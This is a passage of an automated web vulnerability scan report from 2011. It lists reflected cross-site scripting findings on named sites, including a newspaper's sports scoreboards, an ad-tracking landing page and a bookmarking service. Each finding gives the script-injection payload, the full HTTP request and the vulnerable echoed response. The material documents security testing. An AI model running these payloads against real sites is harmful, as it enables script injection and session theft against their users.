adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15012%7C15011%7C15011%7C15013%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15013%7C15013%7C14983%7C15013%7C15003; rv=1; pf=gVcpu03qRQgTB5NuU1EqIYqEr4b4Fq-og3GojR5p24eyrpLutjrg3FTJXr1E8PV6vkLTiGPWsGKJ1Wrqhl-HhQ7j1HFoP4OsobTnoYCCxvnKntOZfYFXgkvEXaL1UobLYMC1xk5bi3WvwsH-xYl33kP849CF7hcjVhWHTHUUYTis0H9ih5-5vFSOsVYuhQt6Iv4QeHxZTxJkHtgeP2GkzQt7XxlMyKRnDT2fVADwdo44PGNU_vJbXyHKcL6jneNP4-z_78WwfuPYpNg79jqGRprSVFacyOS-5Ebs506rt3Aem2wjSmTSakSnCA2AgYS6r3vWJ5sNwMJc7eO_e5WNawlDHzxcnnyKiFnoDhsGNc4pAxb4A7I47CNUJ6AbwwHHAatLSIvwiSzIGMiHluajY8fLBNpf3ENHcSGhLyQY8Gw-qep7oDaftEDZ2hKV8ANOevweg3MZu04fOjiPLG71HIPlyME1Zf31UWf3v_Xcs7g; uid=3011330574290390485
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:01 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:00 GMT Content-Length: 377
1.107. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/fb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad94"><script>alert(1)</script>e2be14c4e6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=10 Date: Tue, 08 Feb 2011 02:34:42 GMT Content-Length: 29771 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
1.108. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/mlb/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125f5"><script>alert(1)</script>5d9a54190c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Tue, 08 Feb 2011 02:34:43 GMT Content-Length: 29152 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
1.109. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/nba/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d26"><script>alert(1)</script>cf0c3971885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Tue, 08 Feb 2011 02:34:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48251
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
1.110. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/nhl/scoreboard.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc282"><script>alert(1)</script>a88736d6b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1 HTTP/1.1 Host: stats.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.0 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Cache-Control: private, max-age=10 Date: Tue, 08 Feb 2011 02:34:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>S ...[SNIP]... <META content="60;/nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1&meta=true" http-equiv="Refresh"> ...[SNIP]...
The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc80'%3balert(1)//b154865b622 was submitted in the lpip parameter. This input was echoed as 7dc80';alert(1)//b154865b622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tracking202/static/landing.php?lpip=72467dc80'%3balert(1)//b154865b622 HTTP/1.1 Host: vmgtrk.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:06:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 3176
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '72467dc80';alert(1)//b154865b622'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2'); var ...[SNIP]...
1.112. http://vmgtrk.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vmgtrk.com
Path:
/tracking202/static/landing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1483e'%3balert(1)//07436e66004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1483e';alert(1)//07436e66004 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tracking202/static/landing.php?lpip=/1483e'%3balert(1)//07436e660047246 HTTP/1.1 Host: vmgtrk.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:06:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 3177
function t202Init(){ //this grabs the t202kw, but if they set a forced kw, this will be replaced
if (readCookie('t202forcedkw')) { var t202kw = readCookie('t202forcedkw'); } else { var t202kw = t202GetVar('t202kw'); }
var lpip = '/1483e';alert(1)//07436e660047246'; var t202id = t202GetVar('t202id'); var OVRAW = t202GetVar('OVRAW'); var OVKEY = t202GetVar('OVKEY'); var OVMTC = t202GetVar('OVMTC'); var c1 = t202GetVar('c1'); var c2 = t202GetVar('c2');
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed9c6"-alert(1)-"bc9b8de2ed6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phped9c6"-alert(1)-"bc9b8de2ed6 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 05:31:21 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ijgl22u3d4netlsb9jif12leu4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1497 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phped9c6"-alert(1)-"bc9b8de2ed6"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14ca5<script>alert(1)</script>f3ce7029187 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php14ca5<script>alert(1)</script>f3ce7029187 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 05:31:21 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=edlikb5dctrbqo0f3e0jmjc3l0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1523 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php14ca5<script>alert(1)</script>f3ce7029187</strong> ...[SNIP]...
1.115. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55ee9"-alert(1)-"40f54fd3f8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/55ee9"-alert(1)-"40f54fd3f8d HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 93707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/55ee9"-alert(1)-"40f54fd3f8d"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
1.116. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 181e9"style%3d"x%3aexpression(alert(1))"e7f1e4a7067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 181e9"style="x:expression(alert(1))"e7f1e4a7067 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/sm/181e9"style%3d"x%3aexpression(alert(1))"e7f1e4a7067ooth HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:25 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 94047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.starbucks.com/sm/181e9"style="x:expression(alert(1))"e7f1e4a7067ooth" /> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4656"style%3d"x%3aexpression(alert(1))"5ee5d2cdcc7 was submitted in the url parameter. This input was echoed as c4656"style="x:expression(alert(1))"5ee5d2cdcc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=starbucks&url=http://www.starbucks.com/smoothc4656"style%3d"x%3aexpression(alert(1))"5ee5d2cdcc7 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:22 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94045
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.starbucks.com/smoothc4656"style="x:expression(alert(1))"5ee5d2cdcc7" /> ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a651a"%20style%3dx%3aexpression(alert(1))%209a725fd9f7d was submitted in the username parameter. This input was echoed as a651a\" style=x:expression(alert(1)) 9a725fd9f7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250&username=starbucksa651a"%20style%3dx%3aexpression(alert(1))%209a725fd9f7d&url=http://www.starbucks.com/smooth HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="pub" name="pub" value="starbucksa651a\" style=x:expression(alert(1)) 9a725fd9f7d" /> ...[SNIP]...
The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e047c"style%3d"x%3aexpression(alert(1))"02571eca9de was submitted in the v parameter. This input was echoed as e047c"style="x:expression(alert(1))"02571eca9de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bookmark.php?v=250e047c"style%3d"x%3aexpression(alert(1))"02571eca9de&username=starbucks&url=http://www.starbucks.com/smooth HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:31:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 93836
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="source" name="source" value="bkm-250e047c"style="x:expression(alert(1))"02571eca9de" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f44e"-alert(1)-"ddd92bfa15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
